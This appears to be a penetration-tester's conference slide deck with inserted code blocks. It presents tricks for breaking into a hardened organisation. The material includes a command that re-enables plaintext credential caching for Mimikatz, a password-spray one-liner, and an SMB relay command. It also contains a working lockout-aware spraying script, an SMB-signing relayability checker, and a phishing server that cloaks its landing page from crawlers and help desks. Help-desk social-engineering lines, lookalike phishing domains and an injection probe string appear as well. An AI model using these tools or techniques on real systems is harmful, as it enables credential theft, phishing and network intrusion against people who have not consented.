Stupid Pentester Tricks

AKA Tantric Pentesting

by Laurent Desaulniers

@el_d33

Whoami

  • Pentester

  • Magician

  • Nsec Challenge Designer

  • Lockpicker

  • Security Amateur

Why?


If it is stupid and it works, then it is not stupid *

Context

Client has:
  • EMET/SRP/LAPS everywhere

  • Patches everywhere

  • 24/7 surveillance

  • Medeco

  • NAC

  • 15 character minimum password policy

  • No NetBIOS/LLMNR, so no Responder <3

Context

[image: table flip]

Physical Pentest is hard

Repeat after me: I AM NOT JAMES BOND

  • Proxmark/RavenHID are conspicuous

  • Key Impressioning is hard

  • Lockpicking can be hard, under pressure

Physical is hard

[image: key mold]

Physical Pentest

  • Always keep spare keys for switching

Physical Pentest

[image: universal]

Demo 1


Universal Door Controller *

* Pending approval from the demo gods

Universal door controller

[image: universal door]

Conspicuous Proxmark?

[image: hazmat]

Access card

[image: hack selfie 2]

Hackers take selfies too…

[image: selfie]

Hackers take selfies too…

Wifi is hard

Client has EAP, well-configured clients, and only accepts valid certificates

[image: table flip 2]

[image: wiphish 2]

Solution

Simple access point + captive portal

DO NOT use an already existing SSID

Create your own.

→ Bypasses most WIPS solutions: they alert on rogue APs impersonating the organisation's own SSIDs, while a new SSID with a captive portal asking for domain credentials is rarely flagged.

Hacking is hard

With most organisations, you can still win using:

  • Responder

  • GPP

  • Mimikatz

Hacking is hard

But what happens when all of these are blocked?

[image: table flip 3]

Mimikatz blocked

If you can run Mimikatz, you are already local admin.

You can turn the anti-Mimikatz off! WDigest stops caching plaintext passwords when UseLogonCredential is 0 (the default since Windows 8.1/2012 R2, and after KB2871997 on older versions); set it back to 1:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Only logons that happen after the change get cached, so wait for (or provoke) a fresh logon before dumping again. The key is also a well-known detection point: expect an alert if the blue team watches registry changes.

PowerSpray

Password spraying is a very effective technique

Try 1 password against all accounts, then the next one: a single guess per account per round keeps you under the lockout threshold (check the threshold and the observation window before you start)

Favourites:
  • Soleil01 (Quebec)

  • CompanyName2016

  • Welcome1

Passwords guaranteed

PowerSpray

No PowerShell? No problem!

Outer loop over passwords, inner loop over users, so every account gets one guess per round (looping the users on the outside would throw the whole list at one account and lock it out):

@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO ^
@net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 ^
&& @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ >NUL
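Spraying only stays safe while the number of guesses an account receives inside one observation window stays below the lockout threshold. The block below is an added example, not code from the talk: a lockout-aware spray loop in Python with the password loop on the outside, which sleeps out the observation window whenever the next round would hit the threshold. The `authenticate` callback, the `LockoutPolicy` values and the accounts and passwords in `demo()` are assumptions/constructed data, so the block runs offline against a fake backend.

```python
"""Lockout-aware password spray: one password per round across every account
(added example, not from the talk).  `authenticate` is pluggable so the same
loop drives any backend (SMB, LDAP, OWA, ...); the demo uses a fake one."""
import time
from collections import deque
from dataclasses import dataclass, field
from typing import Callable, Deque, Iterable, List, Tuple


@dataclass
class LockoutPolicy:
    """Domain lockout settings (what `net accounts /domain` reports)."""
    threshold: int              # bad attempts before lockout; 0 = never locks
    observation_window_s: int   # seconds until the bad-attempt counter resets


@dataclass
class SprayResult:
    hits: List[Tuple[str, str]] = field(default_factory=list)
    attempts: int = 0
    rounds: int = 0
    slept_s: float = 0.0


def spray(users: Iterable[str], passwords: Iterable[str], policy: LockoutPolicy,
          authenticate: Callable[[str, str], bool],
          sleep: Callable[[float], None] = time.sleep,
          now: Callable[[], float] = time.monotonic) -> SprayResult:
    """Outer loop over passwords, inner loop over users: each account receives
    exactly one bad attempt per round.  Before a round starts, the number of
    rounds inside one observation window is kept one below the lockout
    threshold, sleeping until the oldest round expires if necessary."""
    result = SprayResult()
    remaining = list(users)
    budget = None if policy.threshold == 0 else policy.threshold - 1
    if budget is not None and budget < 1:
        raise ValueError("a lockout threshold of 1 leaves no safe attempts")
    round_times: Deque[float] = deque()   # start times of rounds still counted

    def expire(t: float) -> None:
        while round_times and round_times[0] + policy.observation_window_s <= t:
            round_times.popleft()

    for password in passwords:
        if not remaining:
            break
        if budget is not None:
            t = now()
            expire(t)
            if len(round_times) >= budget:
                wait = round_times[0] + policy.observation_window_s - t
                sleep(wait)
                result.slept_s += wait
                t = now()
                expire(t)
            round_times.append(t)
        result.rounds += 1
        still_unknown = []
        for user in remaining:            # one guess per account this round
            result.attempts += 1
            if authenticate(user, password):
                result.hits.append((user, password))
            else:
                still_unknown.append(user)
        remaining = still_unknown         # never re-guess a cracked account
    return result


class FakeClock:
    """Virtual clock so the demo finishes instantly instead of sleeping."""
    def __init__(self) -> None:
        self.t = 0.0

    def now(self) -> float:
        return self.t

    def sleep(self, seconds: float) -> None:
        self.t += seconds


def demo() -> SprayResult:
    # Constructed data: three accounts, two of them using the talk's favourites.
    valid = {"alice": "Soleil01", "bob": "Welcome1"}
    users = ["alice", "bob", "carol"]
    passwords = ["Welcome1", "Soleil01", "CompanyName2016", "Summer2016"]
    policy = LockoutPolicy(threshold=3, observation_window_s=600)
    clock = FakeClock()
    return spray(users, passwords, policy,
                 authenticate=lambda u, p: valid.get(u) == p,
                 sleep=clock.sleep, now=clock.now)


if __name__ == "__main__":
    r = demo()
    print(f"{r.rounds} rounds, {r.attempts} attempts, slept {r.slept_s:.0f}s, hits: {r.hits}")
```

With a threshold of 3 the loop allows two rounds per window, so the demo sleeps out one 600-second window before the third password; swap the fake clock for the real `time` functions and the lambda for an SMB or LDAP bind to use it for real.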

SMB Relay

20 character password policy? No problem! The relay never needs the password.

SMB Relay is very hard to protect against: requiring SMB signing is the real fix, and Windows workstations traditionally ship with signing enabled but not required; only domain controllers require it.

Nessus classifies the finding as low

./smbrelayx.py -h [TARGET_IP] -e [My_EVIL_EXE]

With impacket's smbrelayx.py, -h is the host to relay the captured authentication to, not your own address. Relaying back to the machine the connection came from has been blocked since MS08-068, so pick a second host where the victim is local admin and signing is not required.
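Whether a host is relayable comes down to one field: the SecurityMode bits in its NEGOTIATE response. The block below is an added example (not from the talk, and not impacket code) that parses those bits from SMB2 and SMB1 negotiate responses and answers "relayable or not". The packets are constructed inside the block to mimic a workstation (signing enabled, not required) and a domain controller (required); a real check would feed it the reply to a negotiate request sent to port 445.

```python
"""Is this SMB server relayable?  Parse the signing bits of a NEGOTIATE response
(added example, not from the talk).  Constructed packets below stand in for
what a real host would send back to a negotiate request."""
import struct
from dataclasses import dataclass

SMB2_MAGIC, SMB1_MAGIC = b"\xfeSMB", b"\xffSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001      # set on every SMB2 response
SMB2_SIGNING_ENABLED, SMB2_SIGNING_REQUIRED = 0x0001, 0x0002
SMB1_COM_NEGOTIATE = 0x72
SMB1_FLAGS_REPLY = 0x80
SMB1_SIGNING_ENABLED, SMB1_SIGNING_REQUIRED = 0x04, 0x08


@dataclass
class SigningInfo:
    dialect: str
    signing_enabled: bool
    signing_required: bool

    @property
    def relayable(self) -> bool:
        # A relayed session cannot be signed, so "enabled but not required"
        # (the workstation default) is as good as "disabled" for the attacker.
        return not self.signing_required


def parse_negotiate_response(pkt: bytes) -> SigningInfo:
    """Dispatch on the protocol magic; raises ValueError on anything else."""
    if pkt[:4] == SMB2_MAGIC:
        return _parse_smb2(pkt)
    if pkt[:4] == SMB1_MAGIC:
        return _parse_smb1(pkt)
    raise ValueError("not an SMB packet")


def _parse_smb2(pkt: bytes) -> SigningInfo:
    if len(pkt) < 64 + 6:
        raise ValueError("truncated SMB2 header")
    struct_size, _, _, command, _, flags = struct.unpack_from("<HHIHHI", pkt, 4)
    if struct_size != 64 or command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not an SMB2 NEGOTIATE response")
    body_size, security_mode, dialect = struct.unpack_from("<HHH", pkt, 64)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE response size")
    return SigningInfo(f"SMB2 dialect 0x{dialect:04x}",
                       bool(security_mode & SMB2_SIGNING_ENABLED),
                       bool(security_mode & SMB2_SIGNING_REQUIRED))


def _parse_smb1(pkt: bytes) -> SigningInfo:
    if len(pkt) < 32 + 4:
        raise ValueError("truncated SMB1 header")
    command, flags = pkt[4], pkt[9]
    if command != SMB1_COM_NEGOTIATE or not flags & SMB1_FLAGS_REPLY:
        raise ValueError("not an SMB1 NEGOTIATE response")
    word_count, _dialect_index, security_mode = struct.unpack_from("<BHB", pkt, 32)
    if word_count != 17:                        # NT LM 0.12 response has 17 words
        raise ValueError("not an NT LM 0.12 NEGOTIATE response")
    return SigningInfo("SMB1 NT LM 0.12",
                       bool(security_mode & SMB1_SIGNING_ENABLED),
                       bool(security_mode & SMB1_SIGNING_REQUIRED))


def build_smb2_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Constructed minimal SMB2 NEGOTIATE response (64-byte header + 64-byte body)."""
    header = SMB2_MAGIC + struct.pack("<HHIHHI", 64, 0, 0, SMB2_NEGOTIATE, 1, SMB2_FLAGS_SERVER_TO_REDIR)
    header += struct.pack("<IQIIQ", 0, 0, 0, 0, 0) + bytes(16)   # NextCommand .. Signature
    body = struct.pack("<HHHH", 65, security_mode, dialect, 0) + bytes(16)   # .. ServerGuid
    body += struct.pack("<IIIIQQHHI", 0x7, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return header + body


def build_smb1_response(security_mode: int) -> bytes:
    """Constructed minimal SMB1 NT LM 0.12 NEGOTIATE response."""
    header = SMB1_MAGIC + struct.pack("<BIBH", SMB1_COM_NEGOTIATE, 0, SMB1_FLAGS_REPLY | 0x08, 0xC807)
    header += bytes(2) + bytes(8) + bytes(2) + struct.pack("<HHHH", 0, 0xFEFF, 0, 0)
    return header + struct.pack("<BHB", 17, 0, security_mode) + bytes(31) + struct.pack("<H", 0)


# Constructed samples: workstation default (enabled, not required) vs DC (required).
WORKSTATION_SMB2 = build_smb2_response(SMB2_SIGNING_ENABLED)
DC_SMB2 = build_smb2_response(SMB2_SIGNING_ENABLED | SMB2_SIGNING_REQUIRED)
WORKSTATION_SMB1 = build_smb1_response(0x03 | SMB1_SIGNING_ENABLED)
DC_SMB1 = build_smb1_response(0x03 | SMB1_SIGNING_ENABLED | SMB1_SIGNING_REQUIRED)

if __name__ == "__main__":
    for name, pkt in [("workstation/SMB2", WORKSTATION_SMB2), ("dc/SMB2", DC_SMB2),
                      ("workstation/SMB1", WORKSTATION_SMB1), ("dc/SMB1", DC_SMB1)]:
        info = parse_negotiate_response(pkt)
        print(f"{name:18} {info.dialect:22} relayable={info.relayable}")
```

Run it against the reply to your own negotiate request before pointing a relay at a host: a target answering with the REQUIRED bit set will just drop the relayed session.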

Nothing works? Call support

If you can get tech support to connect to you, you won!

My favourites are:

  • "My screen’s background is asking me for money"

  • "Why did you install a dancing pig icon telling me to call tech support?"

Nothing works? Call the help desk

You can then:

  • invoke-mimikatz

  • Freeze the RAM

  • SMB Relay

  • Fake-UAC

Phishing

Improve your phishing game

Do NOT use security related motives

People are trained to recognize this as phishing.

Cheating at phishing

Test was supposed to be secret… But suddenly, everyone knows about it?

Cheating at phishing

[image: phishy 1]

Cheating at phishing

[image: phishy 2]

Cheating at phishing

I always include an SMB Relay image in all my phish.

Users are told to forward phishing to tech support

Domain selection

Using - instead of . works wonders:

stairs-mydomain.com
support-mydomain.com
www-mydomain.com
hr-mydomain.com

Domain Selection

Always set up valid SPF records.

Helps to prevent being categorized as spam.

Make sure that the website is properly categorized by the web-filtering crawlers before the campaign starts, or the proxy will block it.

HINT Redirect every visitor to the original website, except IPs belonging to your target: crawlers, the help desk and curious responders only ever see the real site.
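One way to implement that hint, as an added example that is not from the talk or from Phishing Frenzy: a small WSGI app that serves the landing page only to the target's address ranges and 302s everybody else to the impersonated site, keeping the request path so a crawler lands on the matching real page. REAL_SITE, TARGET_NETS and TRUSTED_PROXIES are assumptions standing in for a campaign's real values; X-Forwarded-For is honoured only when the TCP peer is your own proxy, because otherwise anyone could spoof a target address in the header and pull the page.

```python
"""Serve the landing page only to the target's address space; send everyone
else (URL categorisation crawlers, the help desk, curious blue-teamers) to the
real site.  Added example; REAL_SITE, TARGET_NETS and TRUSTED_PROXIES are
assumptions standing in for a campaign's actual values."""
import ipaddress
from typing import Optional, Tuple
from wsgiref.simple_server import make_server

REAL_SITE = "https://www.example.com/"                    # site being imitated (assumed)
TARGET_NETS = [ipaddress.ip_network("203.0.113.0/24"),    # target's egress ranges (constructed)
               ipaddress.ip_network("2001:db8:1::/48")]
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.2")}     # our own reverse proxy (constructed)
LANDING_PAGE = b"<html><body><h1>Sign in</h1><!-- landing page goes here --></body></html>"


def client_address(remote_addr: str, forwarded_for: Optional[str]):
    """Trust X-Forwarded-For only when the TCP peer is our own proxy; otherwise
    anyone could put a target IP in the header and fetch the landing page."""
    remote = ipaddress.ip_address(remote_addr)
    if forwarded_for and remote in TRUSTED_PROXIES:
        try:
            return ipaddress.ip_address(forwarded_for.split(",")[0].strip())
        except ValueError:
            pass                                  # garbage header: fall back to the peer
    return remote


def route(remote_addr: str, forwarded_for: Optional[str] = None) -> Tuple[int, str]:
    """(200, "serve") for the target's ranges, (302, REAL_SITE) for everybody else."""
    ip = client_address(remote_addr, forwarded_for)
    if any(ip in net for net in TARGET_NETS):
        return 200, "serve"
    return 302, REAL_SITE


def app(environ, start_response):
    status, dest = route(environ["REMOTE_ADDR"], environ.get("HTTP_X_FORWARDED_FOR"))
    if status == 302:
        # Keep the path so a crawler following the phish link sees the real page.
        location = dest.rstrip("/") + (environ.get("PATH_INFO") or "/")
        start_response("302 Found", [("Location", location)])
        return [b""]
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
    return [LANDING_PAGE]


if __name__ == "__main__":
    # Bind behind TLS termination in practice; plain HTTP here for the demo.
    with make_server("0.0.0.0", 8080, app) as httpd:
        httpd.serve_forever()
```

Out-of-scope visitors, including the categorisation crawler you want to classify the domain as the real brand, get a redirect and nothing else; the landing page is never served to an address you did not put in TARGET_NETS.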

Key points

I use Phishing Frenzy for all of my phishing needs.

I am told GoPhish is very good as well.

Other tricks

Or '1'='<script>alert(1)>../../../passwd%0a%0d Referer:VeryLongDomain.com?id=342333

Send obviously hostile requests with a unique URL you control in the Referer header. If that URL later gets visited or crawled, you know that someone is reading the logs.

Questions?

[image: lol]

Thank you